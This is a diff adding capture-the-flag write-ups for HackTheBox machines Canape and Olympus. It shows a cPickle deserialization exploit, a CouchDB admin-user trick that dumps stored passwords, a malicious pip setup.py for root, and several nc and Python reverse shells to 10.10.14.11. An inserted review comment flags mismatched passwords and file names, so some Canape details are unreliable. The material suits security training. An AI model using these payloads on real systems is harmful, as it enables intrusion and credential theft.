+So the idea here is to open a file whose pid consists of a md5sum of the username and the quote whose characters are in the whitelist, using the check webpage into which cPickle library functions are being called to load the data, so we know that we have a cPickle vulnerability. Essentially, cPickle is like a python serialization, and some things do not serialize well, and basically, cPickle calls a python function:
+
+
+ def __reduce__(self):
+ import os
+ return (os.system,(COMMAND,))
+
+
+In order to clean it up as it does pickling, The exploit is that we serialize a nu reduce call so that once cPickle calls the __reduce__ function it calls the code we just submitted. so let's create the exploit ourselves :
+
+
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks()) # pickle up the IppsecRocks class,
+ print sc
+
+
+Now that's the skeletton of our exploit, which contains the reverse shell one liner pointing at our port 1234, we pickle up the class itself, and we print it to see if it works. So let's test it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → python2 exploit.py
+ cposix
+ system
+ p1
+ (S'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f'
+ p2
+ tp3
+ Rp4
+ .
+
+
+And it gets pickled correctly, so let's continue by following the code we found in our previous git diff cmd: we'll keep in mind that the box is going to md5sum both the character and the quote together, so we need to add an echo command WITHIN the pickle payload:
+
+
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('echo homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks()) # pickle up the IppsecRocks class,
+ #print sc
+ char,quote = sc.split("!")
+
+ print "[+] ------ SPLITTING ------ [+]"
+ print char
+ print "[+] ------ STRING 2 ------- [+]"
+ print quote
+
+
+Now whenever we print out this pickle, it will split it up into 2. So let's test it :
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → python2 exploit.py
+ [+] ------ SPLITTING ------ [+]
+ **cposix
+ system
+ p1
+ (S'echo homer**
+ [+] ------ STRING 2 ------- [+]
+ ;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f'
+ p2
+ tp3
+ Rp4
+ .
+
+
+
+So here you can see the CHARACTER highlighted, and below we'll have the actual QUOTE.
+
+
+ import os
+ import cPickle
+ from hashlib import md5
+ import requests
+
+ class IppsecRocks(object):
+ def __reduce__(self):
+ return (os.system, ('echo homer!;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1234 >/tmp/f',))
+
+ sc = cPickle.dumps(IppsecRocks())
+ char,quote = sc.split("!")
+
+ p_id = md5(char+quote).hexdigest()
+ cPickle.loads(char+quote)
+
+
+
+So here we have our testing python script, we execute it and it gives us a reverse shell onto our local box (for testing purposes):
+
+
+
+So that's successful, now let's modify it accordingly to send the request to both /submit (with the character and quote parameters that we infected) And then finally we send a request to /check to execute the pickle we sent:
+
+
+
+And we get a reverse shell as www-data! however we do not have enough permissions to print out homer's user flag, so we need to privesc. First of all we will upgrade our reverse shell to a tty shell using python's pty.spawn() function:
+
+
+ $ python -c 'import pty;pty.spawn("/bin/bash")'
+ www-data@canape:/home$ ps -auxww
+
+
+Looking at the results of this command, we see that we have couchdb running as root, and running as homer. so we enumerate the box further using netstat:
+
+
+ www-data@canape:/home$ netstat -alnp | grep LIST
+ netstat -alnp | grep LIST
+ (Not all processes could be identified, non-owned process info
+ will not be shown, you would have to be root to see it all.)
+ tcp 0 0 0.0.0.0:32859 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:65535 0.0.0.0:* LISTEN -
+ tcp 0 0 127.0.0.1:5984 0.0.0.0:* LISTEN -
+ tcp 0 0 127.0.0.1:5986 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:80 0.0.0.0:* LISTEN -
+ tcp 0 0 0.0.0.0:4369 0.0.0.0:* LISTEN -
+ tcp6 0 0 :::65535 :::* LISTEN -
+ tcp6 0 0 :::4369 :::* LISTEN -
+ unix 2 [ ACC ] STREAM LISTENING 10727 - /run/systemd/journal/stdout
+ unix 2 [ ACC ] SEQPACKET LISTENING 10740 - /run/udev/control
+ unix 2 [ ACC ] STREAM LISTENING 10729 - /run/systemd/fsck.progress
+ unix 2 [ ACC ] STREAM LISTENING 28181 - /var/run/apache2/cgisock.1047
+ unix 2 [ ACC ] STREAM LISTENING 13346 - /var/run/dbus/system_bus_socket
+ unix 2 [ ACC ] STREAM LISTENING 13347 - /run/uuidd/request
+ unix 2 [ ACC ] STREAM LISTENING 10722 - /run/systemd/private
+
+
+
+here we see that 5984 is the default port couchdb listens on. and we can verify that by using curl:
+
+
+ www-data@canape:/home$ which curl && which wget && which nc
+ which curl && which wget && which nc
+ /usr/bin/curl
+ /usr/bin/wget
+ /bin/nc
+ www-data@canape:/home$ curl 127.0.0.1:5984
+ curl 127.0.0.1:5984
+ {"couchdb":"Welcome","version":"2.0.0","vendor":{"name":"The Apache Software Foundation"}}
+
+
+So we google couchdb's api documentation quickly and we can enumerate the database further accordingly :
+
+
+ www-data@canape:/home$ curl 127.0.0.1:5984/_all_dbs/
+ curl 127.0.0.1:5984/_all_dbs/
+ ["_global_changes","_metadata","_replicator","_users","passwords","simpsons"]
+
+
+
+Using the /_all_dbs/ api call we see that it has 6 databases, from which we'll search _users and passwords :
+
+
+ www-data@canape:/home$ curl 127.0.0.1:5984/_users/_all_docs
+ curl 127.0.0.1:5984/_users/_all_docs
+ {"error":"unauthorized","reason":"You are not a server admin."}
+ www-data@canape:/home$ curl 127.0.0.1:5984/passwords/_all_docs
+ curl 127.0.0.1:5984/passwords/_all_docs
+ {"error":"unauthorized","reason":"You are not authorized to access this db."}
+
+
+So we tried, but didn't go far. so since we are dealing with couchdb 2.0.0 there is a very high likelyhood that we are able to exploit this database by creating a username if we craft the corrcet curl PUT request:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → nano curl.req
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Canape]
+ → cat curl.req
+ curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:nihilist' --data-binary '{
+ "type": "user",
+ "name": "nihilist",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "prometheus"
+ }'
+
+
+
+So this is going to create an administrator user called "nihilist" with his password "prometheus":
+
+
+ www-data@canape:/home$ curl -X PUT 'http://localhost:5984/_users/org.couchdb.user:nihilist' --data-binary '{
+ "type": "user",
+ "name": "nihilist",
+ "roles": ["_admin"],
+ "roles": [],
+ "password": "prometheus"
+ }'
+
+ {"ok":true,"id":"org.couchdb.user:nihilist","rev":"1-9d2d3e05316aa1d30708576e370b242c"}
+
+
+So there we have it, and we are now able to print out the passwords database by specifying our username and password:
+
+
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/_all_docs
+ < --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/_all_docs
+ {"total_rows":4,"offset":0,"rows":[
+ {"id":"739c5ebdf3f7a001bebb8fc4380019e4","key":"739c5ebdf3f7a001bebb8fc4380019e4","value":{"rev":"2-81cf17b971d9229c54be92eeee723296"}},
+ {"id":"739c5ebdf3f7a001bebb8fc43800368d","key":"739c5ebdf3f7a001bebb8fc43800368d","value":{"rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e"}},
+ {"id":"739c5ebdf3f7a001bebb8fc438003e5f","key":"739c5ebdf3f7a001bebb8fc438003e5f","value":{"rev":"1-77cd0af093b96943ecb42c2e5358fe61"}},
+ {"id":"739c5ebdf3f7a001bebb8fc438004738","key":"739c5ebdf3f7a001bebb8fc438004738","value":{"rev":"1-49a20010e64044ee7571b8c1b902cf8c"}}
+ ]}
+
+
+and we get a bunch of ids, so let's curl each one:
+
+
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc4380019e4
+
+ {"_id":"739c5ebdf3f7a001bebb8fc4380019e4","_rev":"2-81cf17b971d9229c54be92eeee723296","item":"ssh","password":"0B4jyA0xtytZi7esBNGp","user":""}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc43800368d
+
+ {"_id":"739c5ebdf3f7a001bebb8fc43800368d","_rev":"2-43f8db6aa3b51643c9a0e21cacd92c6e","item":"couchdb","password":"r3lax0Nth3C0UCH","user":"couchy"}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438003e5f
+
+ {"_id":"739c5ebdf3f7a001bebb8fc438003e5f","_rev":"1-77cd0af093b96943ecb42c2e5358fe61","item":"simpsonsfanclub.com","password":"h02ddjdj2k2k2","user":"homer"}
+ www-data@canape:/home$ curl --user 'nihilist:prometheus' 127.0.0.1:5984/passwords/739c5ebdf3f7a001bebb8fc438004738
+
+ {"_id":"739c5ebdf3f7a001bebb8fc438004738","_rev":"1-49a20010e64044ee7571b8c1b902cf8c","user":"homerj0121","item":"github","password":"STOP STORING YOUR PASSWORDS HERE -Admin"}
+
+
+so we have ssh with a strong password, we have couchdb passsword r3lax0Nth3COUCH, and most importantly, the homer user with his password h02ddjdj2k2k2. We can verify that homer is an user on this machine by printing out /etc/hosts, and therefore we are able to privesc to his permissions using su and his ssh password.
+
+
+ www-data@canape:/home$ cat /etc/passwd | grep homer
+ cat /etc/passwd | grep homer
+ homer:x:1000:1000:homer,,,:/home/homer:/bin/bash
+
+
+Now we verified that homer is an user on this, we login with his ssh password :
+
+
+ www-data@canape:/home$ su homer -
+ su homer -
+ Password: 0B4jyA0xtytZi7esBNGp
+
+ bash: cannot set terminal process group (-1): Inappropriate ioctl for device
+ bash: no job control in this shell
+ homer@canape:/home$ cat /home/homer/user.txt
+ cat /home/homer/user.txt
+ bcXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it! we have been able to print out the user flag.
+
+## **Part 3 : Getting Root Access**
+
+Now our first reflex here is to sudo -l as the user we privesc'd to:
+
+
+ homer@canape:/home$ cd homer
+ cd homer
+ homer@canape:~$ sudo -l
+ sudo -l
+ sudo: no tty present and no askpass program specified
+ homer@canape:~$ python -c 'import pty;pty.spawn("/bin/bash")'
+ python -c 'import pty;pty.spawn("/bin/bash")'
+ homer@canape:~$ sudo -l
+ sudo -l
+ [sudo] password for homer: 0B4jyA0xtytZi7esBNGp
+
+ Matching Defaults entries for homer on canape:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User homer may run the following commands on canape:
+ (root) /usr/bin/pip install *
+
+
+And here we see that homer is allowed to run pip as root. All that we have to do here is create a malicious python package , then install it as root. First we create the setup.py python script containing a python reverse shell pointing at our 9002 port:
+
+
+ homer@canape:~/nihilist$ echo 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.11",9002));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' >setup.py
+
+
+then we use pip to execute our malicious setup.py file, and we catch the incoming reverse shell connection using netcat:
+
+
+
+And we get a reverse shell as root ! Therefore we have been able to print out the root flag.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
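Review bot: the sentence "We can verify that homer is an user on this machine by printing out /etc/hosts" does not match the command that follows it, `cat /etc/passwd | grep homer`; local accounts live in /etc/passwd, so the prose should name that file. The same paragraph presents homer's password as `h02ddjdj2k2k2`, yet the `su homer -` step is answered with `0B4jyA0xtytZi7esBNGp`, the value stored under the `ssh` item, and the couchdb password is transcribed as `r3lax0Nth3COUCH` while the document returned by curl reads `r3lax0Nth3C0UCH` (digit zero); state which value su actually accepted and copy credentials exactly as returned. Between "then we use pip to execute our malicious setup.py file" and "And we get a reverse shell as root" there is no command transcript or listener output, and the "progress graph" under Conclusion has no image, so the root step is asserted rather than shown; include the transcript those sentences refer to.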
diff --git a/Medium/26.md b/Medium/26.md
new file mode 100644
index 0000000..c154704
--- /dev/null
+++ b/Medium/26.md
@@ -0,0 +1,802 @@
+# Olympus Writeup
+
+
+
+## Introduction :
+
+Olympus is a Medium linux box released back in April 2018.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -F 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 08:18 GMT
+ Nmap scan report for 10.10.10.83
+ Host is up (0.080s latency).
+ Not shown: 97 closed ports
+ PORT STATE SERVICE
+ 22/tcp filtered ssh
+ 53/tcp open domain
+ 80/tcp open http
+
+ Nmap done: 1 IP address (1 host up) scanned in 1.67 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → nmap -sCV -p22,53,80 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 08:19 GMT
+ Nmap scan report for 10.10.10.83
+ Host is up (0.081s latency).
+
+ PORT STATE SERVICE VERSION
+ 22/tcp filtered ssh
+ 53/tcp open domain (unknown banner: Bind)
+ | dns-nsid:
+ |_ bind.version: Bind
+ | fingerprint-strings:
+ | DNSVersionBindReqTCP:
+ | version
+ | bind
+ |_ Bind
+ 80/tcp open http Apache httpd
+ |_http-server-header: Apache
+ |_http-title: Crete island - Olympus HTB
+ 1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
+ SF-Port53-TCP:V=7.80%I=7%D=3/18%Time=5E71D995%P=x86_64-pc-linux-gnu%r(DNSV
+ SF:ersionBindReqTCP,3F,"\0=\0\x06\x85\0\0\x01\0\x01\0\x01\0\0\x07version\x
+ SF:04bind\0\0\x10\0\x03\xc0\x0c\0\x10\0\x03\0\0\0\0\0\x05\x04Bind\xc0\x0c\
+ SF:0\x02\0\x03\0\0\0\0\0\x02\xc0\x0c");
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 27.77 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan picked up port 80 so let's investigate it:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~]
+ → dirsearch -u http://10.10.10.83 -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_08-20-40.log
+
+ Target: http://10.10.10.83
+
+ [08:20:40] Starting:
+ [08:20:57] 200 - 66KB - /favicon.ico
+ [08:20:59] 200 - 314B - /index.php
+ [08:20:59] 200 - 314B - /index.php/login/
+
+
+
+Let's investigate both index.php and index.php/login :
+
+
+
+We seem to get an image on /index.php so let's download it and try to see if there's any steganography involved:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → file zeus.jpg
+ zeus.jpg: JPEG image data, JFIF standard 1.01, resolution (DPI), density 300x300, segment length 16, progressive, precision 8, 480x640, components 3
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → exiftool zeus.jpg
+ ExifTool Version Number : 11.91
+ File Name : zeus.jpg
+ Directory : .
+ File Size : 36 kB
+ File Modification Date/Time : 2018:04:07 00:53:19+01:00
+ File Access Date/Time : 2020:03:18 08:29:59+00:00
+ File Inode Change Date/Time : 2020:03:18 08:29:31+00:00
+ File Permissions : rw-r--r--
+ File Type : JPEG
+ File Type Extension : jpg
+ MIME Type : image/jpeg
+ JFIF Version : 1.01
+ Resolution Unit : inches
+ X Resolution : 300
+ Y Resolution : 300
+ Image Width : 480
+ Image Height : 640
+ Encoding Process : Progressive DCT, Huffman coding
+ Bits Per Sample : 8
+ Color Components : 3
+ Y Cb Cr Sub Sampling : YCbCr4:2:0 (2 2)
+ Image Size : 480x640
+ Megapixels : 0.307
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → steghide extract -sf zeus.jpg
+ Enter passphrase:
+ steghide: could not extract any data with that passphrase!
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → strings zeus.jpg
+
+
+
+Doesn't seem like we get anything too obvious, and by using the strings command we don't seem to find anything either, so let's continue by investigating the dns service running on port 53:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig axfr @10.10.10.83 olympus.htb
+
+ ; <<****>> DiG 9.11.16-2-Debian <<****>> axfr @10.10.10.83 olympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ; Transfer failed.
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dig @10.10.10.83 olympus.htb
+
+ ; <<****>> DiG 9.11.16-2-Debian <<****>> @10.10.10.83 olympus.htb
+ ; (1 server found)
+ ;; global options: +cmd
+ ;; Got answer:
+ ;; ->>HEADER <<****- opcode: QUERY, status: SERVFAIL, id: 5749
+ ;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 0, ADDITIONAL: 1
+
+ ;; OPT PSEUDOSECTION:
+ ; EDNS: version: 0, flags:; udp: 4096
+ ;; QUESTION SECTION:
+ ;olympus.htb. IN A
+
+ ;; Query time: 75 msec
+ ;; SERVER: 10.10.10.83#53(10.10.10.83)
+ ;; WHEN: Wed Mar 18 08:34:17 GMT 2020
+ ;; MSG SIZE rcvd: 40
+
+And we seem to get a domain name ! olympus.htb seems to be the one, so let's add it to our /etc/hosts file.
+
+
+ λ root [ 10.10.14.11/23 ] [/home/nihilist]
+ → echo '10.10.10.83 olympus.htb' >> /etc/hosts
+
+
+Now that's done, let's dirsearch the box once again, but this time with the domain name that we added:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → dirsearch -u http://olympus.htb -t 50 -e txt,html,php,xml -x 403
+ git clone https://github.com/maurosoria/dirsearch.git
+ dirsearch -u -e -t 50 -x 500
+
+ _|. _ _ _ _ _ _|_ v0.3.9
+ (_||| _) (/_(_|| (_| )
+
+ Extensions: txt, html, php, xml | HTTP method: get | Threads: 50 | Wordlist size: 7124
+
+ Error Log: /home/nihilist/Desktop/Tools/dirsearch/logs/errors-20-03-18_08-36-49.log
+
+ Target: http://olympus.htb
+
+ [08:36:49] Starting:
+ [08:37:05] 200 - 66KB - /favicon.ico
+ [08:37:07] 200 - 314B - /index.php
+ [08:37:07] 200 - 314B - /index.php/login/
+
+
+
+To which we get the same results:
+
+
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → ls
+ zeus.jpg
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → wget http://olympus.htb/zeus.jpg -O zeus2.jpg
+ --2020-03-18 08:40:59-- http://olympus.htb/zeus.jpg
+ Resolving olympus.htb (olympus.htb)... 10.10.10.83
+ Connecting to olympus.htb (olympus.htb)|10.10.10.83|:80... connected.
+ HTTP request sent, awaiting response... 200 OK
+ Length: 37144 (36K) [image/jpeg]
+ Saving to: ‘zeus2.jpg’
+
+ zeus2.jpg 100%[===================>] 36.27K 209KB/s in 0.2s
+
+ 2020-03-18 08:40:59 (209 KB/s) - ‘zeus2.jpg’ saved [37144/37144]
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → md5sum zeus.jpg && md5sum zeus2.jpg
+ a9e247b275edb0140a8b507fdd21e7ab zeus.jpg
+ a9e247b275edb0140a8b507fdd21e7ab zeus2.jpg
+
+
+By downloading the image from olympus.htb, and by using md5sum we see that both images are exactly the same, so let's use nikto to try and see if there's anything else we can find on the webserver. and while it runs, we check out the response headers from the webpage itself : Firefox > F12 > Network > Response Headers
+
+
+
+Into which we (nikto aswell) see something odd : Xdebug 2.5.5 so let's do a quick searchsploit on it to see if there are any public exploits for us to use:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → searchsploit Xdebug 2
+ ------------------------------------------- ----------------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------- ----------------------------------------
+ xdebug < 2.5.5 - OS Command Execution (Met | exploits/php/remote/44568.rb
+ ------------------------------------------- ----------------------------------------
+ Shellcodes: No Result
+ Papers: No Result
+
+
+Here we see that we have a OS Command Execution Metasploit exploit, so let's check it out:
+
+
+ msf5 > search xdebug
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 exploit/unix/http/xdebug_unauth_exec 2017-09-17 excellent Yes xdebug Unauthenticated OS Command Execution
+
+
+ msf5 > use 0
+ msf5 exploit(unix/http/xdebug_unauth_exec) > show options
+
+ Module options (exploit/unix/http/xdebug_unauth_exec):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ PATH /index.php yes Path to target webapp
+ Proxies no A proxy chain of format type:host:port[,type:host:port][...]
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 80 yes The target port (TCP)
+ SRVHOST 0.0.0.0 yes Callback host for accepting connections
+ SRVPORT 9000 yes Port to listen for the debugger
+ SSL false no Negotiate SSL/TLS for outgoing connections
+ VHOST no HTTP server virtual host
+
+
+ Payload options (php/meterpreter/reverse_tcp):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ LHOST yes The listen address (an interface may be specified)
+ LPORT 4444 yes The listen port
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Automatic
+
+
+Metasploit has it with it's options, but let's see if we can make our own by copying the script locally and by making a python version:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → locate 44568.rb
+ /usr/share/exploitdb/exploits/php/remote/44568.rb
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → cp /usr/share/exploitdb/exploits/php/remote/44568.rb .
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nano 44568.rb
+
+
+So we make the correct python script following the logic behind metasploit's exploit we found earlier
+
+
+
+And from here we simply use the system() function to pass in our reverse shell one liner pointing at our port 9001:
+
+
+ system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 9001 >/tmp/f')
+
+
+` 
+
+And we get a reverse shell as www-data ! Now we don't have access to any user flag right away, but in the /home/zeus directory we seem to have access to an airgeddon directory, so let's check it out:
+
+
+ $ ls -lash
+ total 12K
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 root root 4.0K Apr 8 2018 ..
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 airgeddon
+ $ ls -lash airgeddon
+ total 1.1M
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 ..
+ 4.0K -rw-r--r-- 1 zeus zeus 264 Apr 8 2018 .editorconfig
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .git
+ 4.0K -rw-r--r-- 1 zeus zeus 230 Apr 8 2018 .gitattributes
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .github
+ 4.0K -rw-r--r-- 1 zeus zeus 89 Apr 8 2018 .gitignore
+ 16K -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 CHANGELOG.md
+ 4.0K -rw-r--r-- 1 zeus zeus 3.2K Apr 8 2018 CODE_OF_CONDUCT.md
+ 8.0K -rw-r--r-- 1 zeus zeus 6.3K Apr 8 2018 CONTRIBUTING.md
+ 4.0K -rw-r--r-- 1 zeus zeus 3.3K Apr 8 2018 Dockerfile
+ 36K -rw-r--r-- 1 zeus zeus 35K Apr 8 2018 LICENSE.md
+ 8.0K -rw-r--r-- 1 zeus zeus 4.4K Apr 8 2018 README.md
+ 292K -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 airgeddon.sh
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 binaries
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 captured
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 imgs
+ 16K -rw-r--r-- 1 zeus zeus 16K Apr 8 2018 known_pins.db
+ 672K -rw-r--r-- 1 zeus zeus 670K Apr 8 2018 language_strings.sh
+ 4.0K -rw-r--r-- 1 zeus zeus 33 Apr 8 2018 pindb_checksum.txt
+
+
+In it we see the captured directory, so let's check what's in it:
+
+
+ $ cd captured
+ $ ls -lash
+ total 304K
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 .
+ 4.0K drwxr-xr-x 1 zeus zeus 4.0K Apr 8 2018 ..
+ 292K -rw-r--r-- 1 zeus zeus 291K Apr 8 2018 captured.cap
+ 4.0K -rw-r--r-- 1 zeus zeus 57 Apr 8 2018 papyrus.txt
+
+ $ cat papyrus.txt
+ Captured while flying. I'll banish him to Olympia - Zeus
+
+ $ file captured.cap
+ captured.cap: tcpdump capture file (little-endian) - version 2.4 (802.11, capture length 65535)
+
+
+
+Now we seem to have a riddle here, trying to find "Olympia", and we have a captured.cap file which is a tcpdump capture file v2.4 so let's send it over to our machine:
+
+_Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nc -lvnp 9002 > captured.cap
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+
+
+` _Terminal 2:_
+
+
+ $ cat captured.cap | nc 10.10.14.11 9002
+
+
+` _Terminal 1:_
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nc -lvnp 9002 > captured.cap
+ Ncat: Version 7.80 ( https://nmap.org/ncat )
+ Ncat: Listening on :::9002
+ Ncat: Listening on 0.0.0.0:9002
+ Ncat: Connection from 10.10.10.83.
+ Ncat: Connection from 10.10.10.83:55836.
+
+
+
+And we verify that we have the same file by using md5sum:
+
+
+
+And we have the same file ! so let's use aircrack-ng to see if what's in this captured.cap file.
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → aircrack-ng captured.cap
+ Reading packets, please wait...
+ Opening captured.cap
+ Read 6498 packets.
+
+ # BSSID ESSID Encryption
+
+ 1 F4:EC:38:AB:A8:A9 Too_cl0se_to_th3_Sun WPA (1 handshake)
+
+ Choosing first network as target.
+
+ Reading packets, please wait...
+ Opening captured.cap
+ Read 6498 packets.
+
+ 1 potential targets
+
+ Please specify a dictionary (option -w).
+
+
+And we get a password ! so let's use rockyou.txt to see if we can bruteforce the key using aircrack-ng:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → aircrack-ng -e 'Too_cl0se_to_th3_Sun' -w /usr/share/wordlists/rockyou.txt captured.cap
+
+ Time left: 17 minutes, 7 seconds 54.02%
+
+ KEY FOUND! [ flightoficarus ]
+
+
+ Master Key : FA C9 FB 75 B7 7E DC 86 CC C0 D5 38 88 75 B8 5A
+ 88 3B 75 31 D9 C3 23 C8 68 3C DB FA 0F 67 3F 48
+
+ Transient Key : 46 7D FD D8 1A E5 1A 98 50 C8 DD 13 26 E7 32 7C
+ DE E7 77 4E 83 03 D9 24 74 81 30 84 AD AD F8 10
+ 21 62 1F 60 15 02 0C 5C 1C 84 60 FA 34 DE C0 4F
+ 35 F6 4F 03 A2 0F 8F 6F 5E 20 05 27 E1 73 E0 73
+
+ EAPOL HMAC : AC 1A 73 84 FB BF 75 9C 86 CF 5B 5A F4 8A 4C 38
+
+
+And we found the key ! We now have a few words that might come handy
+
+
+ icarus
+ Too_cl0se_to_th3_Sun
+ flightoficarus
+ zeus
+
+
+Now since our nmap scan returned a filtered ssh service running on port 22 we run another nmap scan to see where we could potentially use those credentials:
+
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nmap -F 10.10.10.83 --top-ports 10000
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:34 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+ Not shown: 8316 closed ports
+ PORT STATE SERVICE
+ 22/tcp filtered ssh
+ 53/tcp open domain
+ 80/tcp open http
+ 2222/tcp open EtherNetIP-1
+
+ Nmap done: 1 IP address (1 host up) scanned in 7.46 seconds
+
+ λ nihilist [ 10.10.14.11/23 ] [~/_HTB/Olympus]
+ → nmap -sCV -p2222 10.10.10.83
+ Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-18 09:35 GMT
+ Nmap scan report for olympus.htb (10.10.10.83)
+ Host is up (0.067s latency).
+
+ PORT STATE SERVICE VERSION
+ 2222/tcp open ssh (protocol 2.0)
+ | fingerprint-strings:
+ | NULL:
+ |_ SSH-2.0-City of olympia
+ | ssh-hostkey:
